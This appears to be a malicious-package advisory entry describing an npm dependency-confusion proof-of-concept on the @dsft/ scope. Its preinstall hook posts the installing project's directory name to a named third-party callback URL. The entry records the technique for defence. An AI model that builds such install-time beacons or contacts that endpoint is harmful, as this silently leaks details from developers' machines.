MAL-2026-5890

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a80ec07b8de5ed0e8cf43a8584075210d47e80e7bcc04368a5029f7637188db3) The package is a dependency-confusion proof-of-concept squatting on the @dsft/ scope. Its package.json declares a preinstall hook that runs index.js, which reads the installer's INIT_CWD environment variable (the consumer's project directory), derives the project's basename, and POSTs it together with a package identifier and timestamp to a hardcoded third-party URL (https://deepbounty.dd06-dev.fr/cb/f9543624-20d8-465b-a026-d01872b93933). The package provides no library functionality matching its name; the install-time beacon is its sole behavior, and the package self-describes as a 'Security PoC for Bug Bounty.' Any `npm install` of this package automatically discloses the installing project's directory name and confirms the host's environment to the operator of the callback endpoint, without consent.